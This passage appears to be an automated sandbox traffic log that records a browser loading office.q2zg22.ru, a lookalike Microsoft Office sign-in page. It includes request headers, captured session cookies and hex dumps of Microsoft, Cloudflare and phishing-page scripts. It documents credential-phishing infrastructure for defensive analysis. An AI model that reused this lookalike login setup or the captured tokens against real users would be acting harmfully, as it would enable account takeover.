                                                                                                                          Data Ascii: } } setTimeout(function(){lp();}, 500); } setTimeout(function(){lp();}, 500);
                                                                                                                          2024-02-02 19:17:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.1649740172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:46 UTC2002OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
                                                                                                                          2024-02-02 19:17:46 UTC642INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:46 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ge3V4FKx6XqCKy8qWcBVQzOVyFiuBD6a3h5jUivq0q76gAneMqKAOmBGpq9Sr%2BNK8mwt9Q4XeKCVFGfW2aWeyEPVv0SL4YXQra7KGYIJ1DiZ3iZHSvvlGe84Ns%2FZPUNvwQ3e"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6b4dc69672b-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.1649741152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:46 UTC617OUTGET /shared/1.0/content/js/BssoInterrupt_Core_aoxn9LgNNeyAz3OYDcN7uA2.js HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:46 UTC750INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 3033284
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: wFzpduTSkmnT+dqkuOoEjg==
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:46 GMT
                                                                                                                          Etag: 0x8DC034905B0FBE6
                                                                                                                          Last-Modified: Fri, 22 Dec 2023 23:52:14 GMT
                                                                                                                          Server: ECAcc (aga/8741)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: aceae8b0-e01e-0085-5376-3a8a79000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 139704
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:46 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                          2024-02-02 19:17:46 UTC1INData Raw: 21
                                                                                                                          Data Ascii: !
                                                                                                                          2024-02-02 19:17:46 UTC16383INData Raw: 3d 3d 69 26 26 2d 31 21 3d 3d 6f 26 26 28 6e 3d 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 69 29 2c 74 3d 75 2e 64 6f 75 62 6c 65 53 70 6c 69 74 28 65 2e 73 75 62 73 74 72 69 6e 67 28 69 2b 31 2c 6f 29 2c 22 26 22 2c 22 3d 22 29 2c 72 3d 75 2e 64 6f 75 62 6c 65 53 70 6c 69 74 28 65 2e 73 75 62 73 74 72 69 6e 67 28 6f 2b 31 29 2c 22 26 22 2c 22 3d 22 29 29 7d 72 65 74 75 72 6e 7b 6f 72 69 67 69 6e 41 6e 64 50 61 74 68 3a 6e 2c 71 75 65 72 79 3a 74 2c 66 72 61 67 6d 65 6e 74 3a 72 7d 7d 2c 6a 6f 69 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 6f 72 69 67 69 6e 41 6e 64 50 61 74 68 7c 7c 22 22 3b 72 65 74 75 72 6e 20 65 2e 71 75 65 72 79 26 26 28 6e 2b 3d 22 3f 22 2b 73 2e 6a 6f 69 6e 28 65 2e 71 75 65 72 79 2c 22 26 22 2c 22 3d 22 29 29
                                                                                                                          Data Ascii: ==i&&-1!==o&&(n=e.substring(0,i),t=u.doubleSplit(e.substring(i+1,o),"&","="),r=u.doubleSplit(e.substring(o+1),"&","="))}return{originAndPath:n,query:t,fragment:r}},join:function(e){var n=e.originAndPath||"";return e.query&&(n+="?"+s.join(e.query,"&","="))
                                                                                                                          2024-02-02 19:17:46 UTC16383INData Raw: 6f 74 46 6f 75 6e 64 4e 6f 74 43 6f 6e 66 69 67 75 72 65 64 46 6f 72 52 65 6d 6f 74 65 4e 67 63 3a 22 35 30 30 33 34 32 22 2c 55 73 65 72 41 63 63 6f 75 6e 74 4e 6f 74 46 6f 75 6e 64 46 61 69 6c 65 64 54 6f 43 72 65 61 74 65 52 65 6d 6f 74 65 53 69 67 6e 49 6e 3a 22 35 30 30 33 34 33 22 2c 55 73 65 72 41 63 63 6f 75 6e 74 4e 6f 74 46 6f 75 6e 64 46 6f 72 46 69 64 6f 53 69 67 6e 49 6e 3a 22 35 30 30 33 34 34 22 2c 49 64 73 4c 6f 63 6b 65 64 3a 22 35 30 30 35 33 22 2c 49 6e 76 61 6c 69 64 50 61 73 73 77 6f 72 64 4c 61 73 74 50 61 73 73 77 6f 72 64 55 73 65 64 3a 22 35 30 30 35 34 22 2c 49 6e 76 61 6c 69 64 50 61 73 73 77 6f 72 64 45 78 70 69 72 65 64 50 61 73 73 77 6f 72 64 3a 22 35 30 30 35 35 22 2c 49 6e 76 61 6c 69 64 50 61 73 73 77 6f 72 64 4e 75 6c 6c
                                                                                                                          Data Ascii: otFoundNotConfiguredForRemoteNgc:"500342",UserAccountNotFoundFailedToCreateRemoteSignIn:"500343",UserAccountNotFoundForFidoSignIn:"500344",IdsLocked:"50053",InvalidPasswordLastPasswordUsed:"50054",InvalidPasswordExpiredPassword:"50055",InvalidPasswordNull
                                                                                                                          2024-02-02 19:17:46 UTC16383INData Raw: 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 65 6c 65 63 74 65 64 22 2c 6e 29 3a 65 2e 73 65 6c 65 63 74 65 64 3d 6e 7d 2c 44 62 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 65 7c 7c 65 3d 3d 3d 61 3f 22 22 3a 65 2e 74 72 69 6d 3f 65 2e 74 72 69 6d 28 29 3a 65 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 78 61 30 5d 2b 7c 5b 5c 73 5c 78 61 30 5d 2b 24 2f 67 2c 22 22 29 7d 2c 55 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 65 3d 65 7c 7c 22 22 2c 21 28 6e 2e 6c 65 6e 67 74 68 3e 65 2e 6c 65 6e 67 74 68 29 26 26 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 6e 2e 6c 65 6e 67 74 68 29 3d 3d 3d 6e 7d 2c 76 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 65 3d 3d
                                                                                                                          Data Ascii: setAttribute("selected",n):e.selected=n},Db:function(e){return null===e||e===a?"":e.trim?e.trim():e.toString().replace(/^[\s\xa0]+|[\s\xa0]+$/g,"")},Ud:function(e,n){return e=e||"",!(n.length>e.length)&&e.substring(0,n.length)===n},vd:function(e,n){if(e==
                                                                                                                          2024-02-02 19:17:46 UTC16383INData Raw: 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 69 6e 64 65 78 4f 66 28 65 29 3b 30 3c 3d 74 26 26 28 74 68 69 73 2e 79 61 28 29 2c 74 68 69 73 2e 76 28 29 5b 74 5d 3d 6e 2c 74 68 69 73 2e 78 61 28 29 29 7d 2c 73 6f 72 74 65 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 28 29 2e 73 6c 69 63 65 28 30 29 3b 72 65 74 75 72 6e 20 65 3f 6e 2e 73 6f 72 74 28 65 29 3a 6e 2e 73 6f 72 74 28 29 7d 2c 72 65 76 65 72 73 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 28 29 2e 73 6c 69 63 65 28 30 29 2e 72 65 76 65 72 73 65 28 29 7d 7d 2c 53 2e 61 2e 42 61 26 26 53 2e 61 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 53 2e 48 61 2e 66 6e 2c 53 2e 74 61 2e 66 6e 29 2c 53 2e 61 2e 44 28 22 70 6f 70
                                                                                                                          Data Ascii: ction(e,n){var t=this.indexOf(e);0<=t&&(this.ya(),this.v()[t]=n,this.xa())},sorted:function(e){var n=this().slice(0);return e?n.sort(e):n.sort()},reversed:function(){return this().slice(0).reverse()}},S.a.Ba&&S.a.setPrototypeOf(S.Ha.fn,S.ta.fn),S.a.D("pop
                                                                                                                          2024-02-02 19:17:46 UTC4INData Raw: 75 6e 63 74
                                                                                                                          Data Ascii: unct
                                                                                                                          2024-02-02 19:17:46 UTC16383INData Raw: 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 53 2e 75 2e 47 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 28 65 2c 76 28 6f 29 2c 68 2c 70 2e 24 64 61 74 61 2c 70 29 3b 69 66 28 6e 26 26 6e 2e 63 6f 6e 74 72 6f 6c 73 44 65 73 63 65 6e 64 61 6e 74 42 69 6e 64 69 6e 67 73 29 7b 69 66 28 66 21 3d 3d 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4d 75 6c 74 69 70 6c 65 20 62 69 6e 64 69 6e 67 73 20 28 22 2b 66 2b 22 20 61 6e 64 20 22 2b 6f 2b 22 29 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20 63 6f 6e 74 72 6f 6c 20 64 65 73 63 65 6e 64 61 6e 74 20 62 69 6e 64 69 6e 67 73 20 6f 66 20 74 68 65 20 73 61 6d 65 20 65 6c 65 6d 65 6e 74 2e 20 59 6f 75 20 63 61 6e 6e 6f 74 20 75 73 65 20 74 68 65 73 65 20 62 69 6e 64 69 6e 67 73 20 74 6f 67 65 74 68
                                                                                                                          Data Ascii: ion"==typeof t&&S.u.G((function(){var n=t(e,v(o),h,p.$data,p);if(n&&n.controlsDescendantBindings){if(f!==a)throw Error("Multiple bindings ("+f+" and "+o+") are trying to control descendant bindings of the same element. You cannot use these bindings togeth
                                                                                                                          2024-02-02 19:17:46 UTC16383INData Raw: 65 74 75 72 6e 7b 63 6f 6e 74 72 6f 6c 73 44 65 73 63 65 6e 64 61 6e 74 42 69 6e 64 69 6e 67 73 3a 21 30 7d 7d 2c 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 53 2e 61 2e 42 62 28 65 2c 6e 28 29 29 7d 7d 2c 53 2e 68 2e 65 61 2e 74 65 78 74 3d 21 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 26 26 73 2e 6e 61 76 69 67 61 74 6f 72 29 7b 76 61 72 20 65 2c 6e 2c 74 2c 72 2c 69 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 31 5d 29 7d 2c 75 3d 73 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 28 65 3d 73 2e 6f 70 65 72 61 26 26 73 2e 6f 70 65 72 61 2e 76 65 72 73 69 6f 6e 26 26 70 61 72 73 65 49 6e 74 28 73 2e 6f 70 65 72 61 2e 76 65 72 73 69 6f 6e
                                                                                                                          Data Ascii: eturn{controlsDescendantBindings:!0}},update:function(e,n){S.a.Bb(e,n())}},S.h.ea.text=!0,function(){if(s&&s.navigator){var e,n,t,r,i,o=function(e){if(e)return parseFloat(e[1])},u=s.navigator.userAgent;(e=s.opera&&s.opera.version&&parseInt(s.opera.version
                                                                                                                          2024-02-02 19:17:46 UTC16383INData Raw: 65 3a 20 7b 30 7d 2c 20 70 61 72 61 6d 73 3a 20 7b 20 7d 20 7d 22 2c 65 29 7d 2c 65 2e 62 69 6e 64 69 6e 67 48 61 6e 64 6c 65 72 73 2e 64 65 66 69 6e 65 47 6c 6f 62 61 6c 73 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 2c 69 2c 6f 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 76 61 72 20 6e 3d 22 22 3b 74 72 79 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 2c 74 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3e 30 26 26 74 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 76 61 6c 75 65 26 26 28 6e 3d 74 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 76 61 6c 75 65 29 7d 63 61 74 63 68 28 72 29 7b 7d 72 65 74 75 72 6e 20 6e 7d 76 61
                                                                                                                          Data Ascii: e: {0}, params: { } }",e)},e.bindingHandlers.defineGlobals={init:function(n,t,r,i,o){function a(e){var n="";try{var t=document.createElement("div");t.innerHTML=e,t.childNodes.length>0&&t.childNodes[0].value&&(n=t.childNodes[0].value)}catch(r){}return n}va


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.1649742172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:47 UTC1150OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
                                                                                                                          2024-02-02 19:17:47 UTC674INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:47 GMT
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/24864818/main.js
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: accept-encoding
                                                                                                                          cache-control: max-age=300, public
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dn%2FUML%2F9jNQ0cEFCmAQpiVJ2teUTDA8IfHXBkkv5FY3rsbzCN5e73Loduw9zxXgfcnb692jEWbX9hDiZZS3HhpxrQhOM%2FqGBdQfHt%2FSAUBWskJGP2VgM7JZazzcxXuNunQnX"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6baaa5ead57-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.1649743172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:47 UTC1163OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/24864818/main.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
                                                                                                                          2024-02-02 19:17:47 UTC659INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:47 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          cache-control: max-age=14400, public
                                                                                                                          vary: accept-encoding
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QzDLeEArcGHH5fJobvQF%2Bd4qDu1g1hhFmfOc4oLruMnWUxNGi8N5EzMw7p8Avdb4tAiLnEVZa%2BuQFgjm6CkrVDN4TXu87e7mIv4ZPTo3%2Fa%2FcwM%2FMuFj5eTr%2BG4lWw3VN6qG1"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6be0ffa12e3-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:47 UTC710INData Raw: 31 63 66 34 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 52 2c 67 2c 68 2c 69 2c 6a 2c 6f 29 7b 52 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 51 2c 66 2c 79 29 7b 66 6f 72 28 51 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 79 3d 70 61 72 73 65 49 6e 74 28 51 28 33 31 37 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 51 28 33 39 38 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 51 28 33 34 33 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 51 28 33 32 31 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 51 28 33 35 39 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 51 28 33 31 38 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 51 28 33 34 39 29 29 2f 37 2a 28
                                                                                                                          Data Ascii: 1cf4window._cf_chl_opt={cFPWv:'b'};~function(R,g,h,i,j,o){R=b,function(d,e,Q,f,y){for(Q=b,f=d();!![];)try{if(y=parseInt(Q(317))/1+parseInt(Q(398))/2*(-parseInt(Q(343))/3)+parseInt(Q(321))/4*(-parseInt(Q(359))/5)+-parseInt(Q(318))/6+-parseInt(Q(349))/7*(
                                                                                                                          2024-02-02 19:17:47 UTC1369INData Raw: 29 29 29 2c 42 3d 64 5b 57 28 33 38 33 29 5d 5b 57 28 33 39 37 29 5d 26 26 64 5b 57 28 33 37 32 29 5d 3f 64 5b 57 28 33 38 33 29 5d 5b 57 28 33 39 37 29 5d 28 6e 65 77 20 64 5b 28 57 28 33 37 32 29 29 5d 28 42 29 29 3a 66 75 6e 63 74 69 6f 6e 28 48 2c 58 2c 49 29 7b 66 6f 72 28 58 3d 57 2c 48 5b 58 28 33 31 35 29 5d 28 29 2c 49 3d 30 3b 49 3c 48 5b 58 28 33 37 34 29 5d 3b 48 5b 49 2b 31 5d 3d 3d 3d 48 5b 49 5d 3f 48 5b 58 28 33 36 34 29 5d 28 49 2b 31 2c 31 29 3a 49 2b 3d 31 29 3b 72 65 74 75 72 6e 20 48 7d 28 42 29 2c 43 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 43 3d 43 5b 57 28 33 37 35 29 5d 5b 57 28 33 38 37 29 5d 28 43 29 2c 44 3d 30 3b 44 3c 42 5b 57 28 33 37 34 29 5d 3b 45 3d 42 5b 44 5d 2c 46 3d 6c 28 64 2c 66 2c 45 29 2c
                                                                                                                          Data Ascii: ))),B=d[W(383)][W(397)]&&d[W(372)]?d[W(383)][W(397)](new d[(W(372))](B)):function(H,X,I){for(X=W,H[X(315)](),I=0;I<H[X(374)];H[I+1]===H[I]?H[X(364)](I+1,1):I+=1);return H}(B),C='nAsAaAb'.split('A'),C=C[W(375)][W(387)](C),D=0;D<B[W(374)];E=B[D],F=l(d,f,E),
